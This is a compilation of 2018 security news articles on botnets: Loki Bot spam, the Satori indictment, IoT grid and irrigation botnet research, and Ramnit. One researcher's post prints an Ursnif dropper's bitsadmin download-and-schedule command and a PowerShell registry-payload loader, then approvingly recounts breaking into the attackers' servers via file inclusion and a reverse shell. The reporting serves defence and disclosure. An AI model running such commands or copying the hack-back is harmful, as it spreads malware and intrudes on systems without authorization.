In terms of territorial distribution of control servers, the backdoor Njrat unsurprisingly claimed the “most international” prize, with C&C centers in 99 countries. This geographical scope is down to the ease of configuring a personal backdoor, allowing anyone to create their own botnet with minimal knowledge of malware development.

Distribution map of Njrat C&C centers, H2 2017 — H1 2018 (download)

Next come the backdoors DarkComet and NanoCore RAT. They share silver and bronze, having C&Cs in almost 80 countries worldwide. Despite the arrest of the creator of NanoCore, he managed to sell the source code of his privately developed RAT, which is now actively used by other cybercriminals.

Distribution map of DarkComet C&C centers, H2 2017 — H1 2018 (download)

Distribution map of NanoCore RAT C&C centers, H2 2017 — H1 2018 (download)

A look at the geography of infection targets reveals that another backdoor, QRAT, has the largest reach. In H2 2017, we registered infection attempts in 190 countries, and this year QRAT added two more countries, bringing the total to 192.

QRAT distribution map, H2 2017 — H1 2018 (download)

This extensive scope is due to the SaaS (Software-as-a-Service), or rather MaaS (Malware-as-a-Service), distribution model QRAT can be purchased for 30 or 90 days, or for one year. Its cross-platform nature (the malware is written in Java) also plays a role.

Conclusion
By intercepting bot commands, we can track the latest trends in the world of virus writers and provide maximum protection for our users.

Here are the main trends that we identified from analyzing files downloaded by bots:

The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for mining cryptocurrency.
Backdoors consistently make up the bulk of downloads; that is, botnet operators are keen to gain maximum possible control over infected devices.
The number of downloaded droppers is also on the rise, indicative of attacks that are multistage and growing in complexity.
The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers (see above).
Increasingly, botnets are leased according to the needs of the customer, and in many cases it is difficult to pinpoint the “specialization” of the botnet.


Kaspersky warns of a new Loki Bot campaign target corporate mailboxes
4.9.2018 securityaffairs BotNet

Security experts from Kaspersky Lab have uncovered a new spam campaign leveraging the Loki Bot malware to target corporate mailboxes.
The Loki Bot attacks started in July and aimed at stealing passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets

Loki Bot operators employ various social engineering technique to trick victims into opening weaponized attachments that would deploy the Loki Bot stealer.

The messages use attachments with .iso extensions, a type of file that worked as a container for delivering malware.

“Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot.” reads the analysis published by Kaspersky.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.”

The messages masquerade as notifications from other companies, or as orders and offers.

Threat actors are sending out copies of Loki Bot to company email addresses that were available on public sources or from the companies’ own websites.

Loki Bot

Experts observed different spam messages including fake notifications from well-known companies, fake notifications containing financial documents, and fake orders or offers.

Researchers highlighted the importance for organizations of adopting security measures that include both technical protections and training for employees.

“Every year we observe an increase in spam attacks on the corporate sector.” Kaspersky concludes.

“The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc.”


Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy
31.8.2018 securityaffairs BotNet

Today I’d like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi botnet.
In other words: from a simple “Malware Sample” to “Pwn the Attacker Infrastructure”.
NB: Federal Police have already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018). Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved in that threat. I am not going to publicly disclose the victims IPs.

This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.
Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will not disclose the found Malware code nor the Malware Command and Control code nor details on attacker’s group since I won’t put on future attackers new Malware source code ready to be used.
My entire “Cyber adventure” began with a simple email within a .ZIP file named “Nuovo Documento1.zip” as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like de-obfuscate hidden code (every time it’s like a personal challenge). After some hardworking-minutes ( 😀 ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security, and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.

Stage1. Obfuscation
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follow:

"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by Anunak APT during bank frauds in the past few years.

The Stage2 analysis (huge step ahead here) brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It’s a significative indication of a Decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since the signature was changing from the original payload. Finally the de-packed payload presented many interesting features; for example, it was weaponized with evasion techniques such as: timing delay (through sleep), loop delay by calling 9979141 times GetSystemTimeAsFileTime API, BIOSversioning harvesting, system manufacturer information and system fingerprinting to check if it was running on the virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6’).Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
"C:\Users\J8913~1.SEA\AppData\Local\Temp\2e6d628189703d9ad4db9e9d164775bd.exe"

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2

C:\Windows\system32\SearchIndexer.exe /Embedding

taskhost.exe SYSTEM

C:\Windows\System32\wsqmcons.exe

taskhost.exe $(Arg0)

C:\Windows\System32\svchost.exe -k WerSvcGroup

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"

C:\Windows\system32\WerFault.exe -u -p 2524 -s 288

"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

nslookup myip.opendns.com resolver1.opendns.com
Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:
C2 level_1 (for domains and IPs check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
C2 level_2 (for domains and IPs check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It ‘s a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and by performing main in the browser attack against main websites such as PayPal, Gmail, Microsoft and many online services.
So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was “hhandmade and pretty “young” as implementation by mthe eaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi’s mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.
Fortunately ,I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker’s command and control.

Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2 took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database
Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least athe dditional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a “test” connection from the Attacker and focus to decrypt such a connection. Fortunately ,everything needed was written on command and control source code. In the specific case ,the following function was fundamental to get to clear text !

URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilà, it was possible to checkin in attacker’s email 😀 !

Attacker eMail: VPS credentials
Once “in” a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure, it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals !
Summary:

In this post, I described the main steps that took me to gain full access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.
The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.

Victims Distribution on August 24 2018

During the analyses was interesting to observe attacker was acquiring domains from an apparent “black market”where many actors where selling and buying “apparent compromised domains” (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.

Apparent Domain BlackMarket
Hope you enjoyed the reading.

Further details, including the Indicators of compromise, are reported in the analysis published by Marco Ramilli on his blog.


Federal prosecutors indicted a 20-year-old man who built the Satori botnet
31.8.2018 securityaffairs BotNet

A youngster (20) from Washington was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a Mirai variant dubbed Satori.
MalwareMustDie Team: “It’s time for every teenager or young man to know that playing with malware is the fastest way to finish in the jail”

Mirai, Mirai and again Mirai: after the source code has been leaked online gangs of teenagers have been engaged in a new playground. Based on a (solid) software infrastructure Mirai is still able to work well and to be lethal also because the effort to update it is not titanic and the skills of the hacker can be modest. In other words, infecting the Planet nowadays it is (still) very easy and the attack pattern seems clear: download Mirai source code, change the exploits, and everything works fine, but this time the story did not have a happy ending.

The news comes from the legendary Kevin Poulsen who has posted the news on the Daily Beast reporting that “a 20-year-old Washington man was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a notorious botnet tearing through routers around the world.”

“last December, researchers at the Check Point cybersecurity firm traced Satori to an amateur known as “Nexus Zeta” who frequented a web forum for untrained and wannabe malicious hackers. Two months later, a little-noticed Pastebin post by rival hackers purported to reveal Nexus Zeta’s real identity, naming the same Kenneth Schuchman indicted last week.” wrote Poulsen.

Then Kenneth Schuchman who “lives in Vancouver, Washington with his father”, now is indicted even if the indictment doesn’t name the malware, but “all signs point to the virulent Satori botnet that surfaced last fall, and has infected at least 500,000 internet routers around the word”, added Kevin Poulsen.

The activity of the Satori botnet has been observed by CheckPoint security at the end of 2017, below the findings included in a report published by the firm.

“A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousands of attempts to exploit it have already been found in the wild.
The delivered payload has been identified as OKIRU/SATORI, an updated variant of Mirai.
The suspected threat actor behind the attack has been identified by his nickname, ‘Nexus Zeta’.” states the report published by Check Point security
satori

The strange thing about those wannabe hackers is that their emotional background plays a crucial role during the investigation: as Mr. Poulsen reports Kenneth Schuchman wrote on Facebook in 2015 regarding Pokemon Go: “I do black hat hacking all the time and I haven’t even downloaded this game let alone played it.”. From “blackhat hacking all the time” to the jail the passage is short.

I asked a quick comment to Odisseus, an Italian member of the MalwareMustDie team. MalwareMustDie members fight against malware since a long time and is the group who firstly, in the world, discovered and analyzed Mirai for the very first time in the late August 2016 thanks to the excellent reverse engineering skills of their head @unixfreaxjp.

“It’s been two years since Mirai has been discovered and it’s still able to infect thousands of routers around the world: but this news appears like a symbolic anniversary. It is very important to give space to this kind of news because every teenager or young man needs to know that playing with malware is the fastest way to finish in jail”.


Loki Bot: On a hunt for corporate passwords

31.8.2018 Kaspersky  BotNet

Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot. The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.

ISO images are copies of optical discs that can be mounted in a virtual CD/DVD drive to be used in the same way as the originals. Whereas in days of yore users needed dedicated software to open this type of image, today’s operating systems support the format out of the box, and if you want to access the contents of the file, all you need to do is double-click. Malicious spam uses this type of file as a container for delivering malware, albeit rarely.

As mentioned above, hackers were sending out copies of Loki Bot to company email addresses that could be obtained from public sources or from the companies’ own websites.

The emailed messages were notably diverse:

Fake notifications from well-known companies

Imitating messages from well-known corporations is one of the most popular tricks in the hackers’ arsenal. Interestingly enough, fake emails used to be directed mostly at common users and customers, whereas now companies are increasingly the target.

Fake notifications containing financial documents

The scammers passed off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually no more than a few lines and the subject mentioning what exactly is purported to be attached.

Fake orders or offers

Phishers may pose as customers placing an order, or a vendor offering their goods or services.

Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why today it’s essential for corporate security measures to include both technical protection and training for employees, because their actions may cause irreparable damage to the business.


Loki Bot Attacks Target Corporate Mailboxes
30.8.2018 securityweek BotNet

Loki Bot’s operators have been targeting corporate mailboxes with their spam messages, Kaspersky Lab reports.

The emails employ various lures to trick potential victims into opening malicious attachments that would deploy the Loki Bot stealer onto the target machines. The messages masquerade as notifications from other companies, or as orders and offers.

As part of the campaign, cybercriminals have been targeting corporate mailboxes that can be obtained from public sources or which are listed on the targeted companies’ websites, Kaspersky discovered.

The spam messages would attempt to deliver the malicious payload via an attached ISO file. The extension is associated with copies of optical discs that can be mounted to access their content. Modern operating systems can mount ISO files directly, but dedicated software that can handle the extension also exists.

ISO files represent complete images of optical discs, and cybercriminals are now abusing them as containers for delivering their malicious applications, it seems. Such occurrences, however, are rare, Kaspersky says.

As part of the recent campaign, the ISO files contained the Loki Bot malware, an information-stealing Trojan designed to harvest usernames and passwords from the victim machines, along with other user data.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners,” Kaspersky notes.

The new campaign proves yet again that the security measures organizations take should also include training for employees, in addition to technical protection. Employees’ actions can cause irreparable damage to a business, the security firm notes.

“Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc,” Kaspersky concludes.


Botnet of Smart Heaters, ACs Can Cause Power Disruptions: Researchers

16.8.2018 securityweek BotNet

BlackIoT attack can lead to power grid disruptions

A research paper published this week at the 27th USENIX Security Symposium describes a new type of attack that could cause energy grid disruptions. The method involves a botnet powered by tens of thousands of compromised high-wattage IoT devices such as heaters and air conditioners.

Wi-Fi enabled air conditioners, ovens, water heaters and space heaters that can be controlled remotely over the Internet are increasingly popular. The power usage of these devices ranges between 1,000 and 5,000 watts.

Researchers from the Department of Electrical Engineering at Princeton University claim that these types of high-wattage IoT devices can be exploited in what they call “Manipulation of demand via IoT” (MadIoT) attacks to cause local power outages and even large-scale blackouts.

In a MadIoT attack, a threat actor takes control of smart high-wattage devices in order to manipulate (i.e. increase or decrease) power consumption.

MadIoT attack

The experts tested their theory using state-of-the-art simulators of real-world power grid models.

One attack scenario involves frequency instability. The researchers noted that the normal operation of a power grid relies on the balance between supply and demand. They believe that this balance can be disrupted using an IoT botnet of air conditioners and heater that are simultaneously switched on or off by the attacker.

“If the resulting sudden increase in the demand is greater than a threshold, which depends on the inertia of the system, it can cause the system’s frequency to drop significantly before the primary controllers can react,” the researchers wrote in their paper. “This consequently may result in the activation of the generators’ protective relays and loss of generators, and finally a blackout. Sudden decrease in the demand may also result in the same effect but this time by causing a sudden rise in the frequency.”

Using a simulator based on the power grid model of the Western Electricity Coordinating Council (WECC), which is responsible for compliance monitoring and enforcement in the Western part of the United States and Canada, researchers calculated that a 30 percent increase in power demand would lead to all generators tripping.

In order to launch such an attack, experts determined that an attacker would need a botnet of 90,000 air conditioners and 18,000 electric water heaters within the targeted geographical area.

Register for SecurityWeek’s 2018 ICS Cyber Security Conference

A botnet of roughly 100,000 IoT systems may not seem like an impossible task considering that the Mirai botnet, at its peak, infected over 600,000 devices. However, those devices were distributed across more than 160 countries and they included low-wattage devices such as cameras. In the case of a MadIoT botnet, the bots would need to be concentrated in the region of the targeted power grid and they would need to be high-wattage devices for the attack to have an impact.

If the attack leads to a blackout, the grid operator will need to perform what is known as a black start in order to get the power back on. During this process, power is restored in one area at a time to avoid frequency instability. The attacker can use the botnet to suddenly increase demand once power is restored in one area, which can cause the grid to shut down once again.

Another type of attack, which can also lead to a widespread blackout, involves line failures that lead to further line failures in what is known as a cascading failure. Tests for this type of attack were conducted using a simulation of the power grid in Poland, which researchers say is one of the largest and most detailed publicly available real-world power grids.

Calculations showed that an increase of one percent in the demand in Poland’s grid during the summer of 2008 would result in a cascading failure with 263 line failures and an 86 percent load outage. Such an attack would require a botnet of 210,000 compromised air conditioners.

Researchers noted that even if the botnet does not cause frequency instability or line failures, simultaneously turning on tens of thousands of devices within a region can significantly increase costs for the grid operator. These types of attacks could be launched by utilities that operate reserve generators, which provide grid operators electric power – at a higher-than-normal cost – if the demand is higher than estimated, experts said.

“The MadIoT attacks’ sources are hard to detect and disconnect by the grid operator due to their distributed nature. These attacks can be easily repeated until being effective and are black-box since the attacker does not need to know the operational details of the power grid. These properties make countering the MadIoT attacks challenging,” they wrote in their paper.

The same team of Princeton researchers has published a separate paper focusing on how the power grid can be protected against IoT botnets of high wattage devices.

Experts and government authorities have often warned that there is an increasing risk of cyber attacks aimed at the energy sector. However, most warnings involve scenarios in which actors target energy organizations directly.

Earlier this year, researchers warned that threat actors may be able to cause blackouts by remotely manipulating residential or commercial AC units via RF signals to create a surge. However, other experts argued that such attacks would not be easy to carry out in the real world – at least in the United States – due to how power distribution works.


Piping botnet: Researchers warns of possible cyberattacks against urban water services
16.8.2018 securityaffairs BotNet

Piping botnet – Israeli researchers warn of a potential distributed attack against urban water services that uses a botnet of smart irrigation systems that water simultaneously.
Ben-Gurion University of the Negev (BGU) cyber security researchers warn of a potential distributed attack against urban water services that uses a botnet of smart irrigation systems that water simultaneously. A botnet is a large network of computers or devices controlled by a command and control server without the owner’s knowledge.

Ben Nassi, a researcher at Cyber@BGU, will be presenting “Attacking Smart Irrigation Systems” in Las Vegas at the prestigious Def Con 26 Conference in the IoT Village on August 11.

The researchers analyzed and found vulnerabilities in a number of commercial smart irrigation systems, which enable attackers to remotely turn watering systems on and off at will. The researchers tested three of the most widely sold smart irrigation systems: GreenIQ, BlueSpray, and RainMachine smart irrigation systems. Watch the video.

“By simultaneously applying a distributed attack that exploits such vulnerabilities, a botnet of 1,355 smart irrigation systems can empty an urban water tower in an hour and a botnet of 23,866 smart irrigation systems can empty good water reservoir overnight,” Nassi says. “We have notified the companies to alert them of the security gaps so they can upgrade their smart system’s irrigation system’s firmware.”

Water production and delivery systems are part of a nation’s critical infrastructure and generally, are secured to prevent attackers from infecting their systems. “However, municipalities and local government entities have adopted new green technology using IoT smart irrigation systems to replace traditional sprinkler systems, and they don’t have the same critical infrastructure security standards.”

In the study, the researchers present a new attack against urban water services that doesn’t require infecting its physical cyber systems. Instead, the attack can be applied using a botnet of smart irrigation regulation systems at urban water services that are much easier to attack.

piping botnet

The researchers demonstrated how a bot running on a compromised device can (1) detect a smart irrigation system connected to its LAN in less than 15 minutes, and (2) turn on watering via each smart irrigation system using a set of session hijacking and replay attacks.

Further technical details on the Piping botnet are included in the article published by the experts, titled “Piping Botnet – Turning Green Technology into a Water Disaster”

“Although the current generation of IoT devices is being used to regulate water and electricity obtained from critical infrastructures, such as the smart-grid and urban water services, they contain serious security vulnerabilities and will soon become primary targets for attackers,” says Nassi, who is also Ph.D. student of Prof. Yuval Elovici’s in BGU’s Department of Software and Information Systems Engineering and a researcher at the BGU Cyber Security Research Center. Elovici is the Center’s director as well as the director of Telekom Innovation Labs at BGU.

The research team also included Ph.D. student Yair Meidan supervised by Dr. Asaf Shabtai, as well as two interns, Moshe Sror and Ido Lavi.

Previous research focused on a new method to detect illicit drone video-filming.

About the Author: American Associates, Ben-Gurion University of the Negev

American Associates, Ben-Gurion University of the Negev (AABGU) plays a vital role in sustaining David Ben-Gurion’s vision: creating a world-class institution of education and research in the Israeli desert, nurturing the Negev community and sharing the University’s expertise locally and around the globe. As Ben-Gurion University of the Negev (BGU) looks ahead to turning 50 in 2020, AABGU imagines a future that goes beyond the walls of academia. It is a future where BGU invents a new world and inspires a vision for a stronger Israel and its next generation of leaders. Together with supporters, AABGU will help the University foster excellence in teaching, research and outreach to the communities of the Negev for the next 50 years and beyond. Visit vision.aabgu.org to learn more.

AABGU, which is headquartered in Manhattan, has nine regional offices throughout the United States. For more information, visit http://www.aabgu.org.


Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet
8.8.2018 securityaffairs   BotNet

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, created by Ramnit operators.
Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, that could be the sign of a wider ongoing operation involving the Ramnit operators.

Ramnit is one of the most popular banking malware families in existence today, it was first spotted in 2010 as a worm, in 2011, its authors improved it starting from the leaked Zeus source code turning the malware into a banking Trojan. In 2014 it reached the pinnacle of success, becoming the fourth largest botnet in the world.

In 2015, Europol partnering with several private technology firms announced the takedown of the Ramnit C2 infrastructure.

A few months later Ramnit was back, the researchers at IBM security discovered a new variant of the popular Ramnit Trojan.

Recently the experts observed that the “Black” botnet campaign has infected up 100,000 systems in two months, and this is just the tip of the iceberg because according to researchers a second-stage malware called Ngioweb is already spreading.

There is the concrete risk that Ramnit operators are using the two malware to build a large, multi-purpose proxy botnet that could be used for many fraudulent activities (i.e. DDoS attacks, ransomware-based campaigns, cryptocurrency mining campaigns).

“Recently we discovered the Ramnit C&C server (185.44.75.109) which is not related to the previously most prevalent botnet “demetra”. According to domain names which are resolved to the IP address of this C&C server, it pretends to control even old bots, first seen back in 2015. We named this botnet “Black” due to the RC4 key value, “black”, that is used for traffic encryption in this botnet.” reads the analysis published by Checkpoint security.

“This C&C server has actually been active since 6th March 2018 but didn’t attract attention because of the low capacity of the “black” botnet at that time. However, in May-July 2018 we detected a new Ramnit campaign with around 100,000 computers infected.”

According to the experts, in the Black operation, the Ramnit malware is distributed via spam campaigns. The malicious code works as a first-stage malware and it is used to deliver a second-stage malware dubbed Ngioweb.

“Ngioweb represents a multifunctional proxy server which uses its own binary protocol with two layers of encryption,” continues the analysis published by Checkpoint.

“The proxy malware supports back-connect mode, relay mode, IPv4, IPv6 protocols, TCP and UDP transports, with first samples seen in the second half of 2017.”

Ngioweb leverages a two-stage C&C infrastructure, the STAGE-0 C&C server informs the malware about the STAGE-1 C&C server while the unencrypted HTTP connection is used for this purpose. The second STAGE-1 C&C server is used for controlling malware via an encrypted connection.

Ramnit campaign

The Ngioweb malware can operate in two main modes, the Regular back-connect proxy, and the Relay proxy mode.

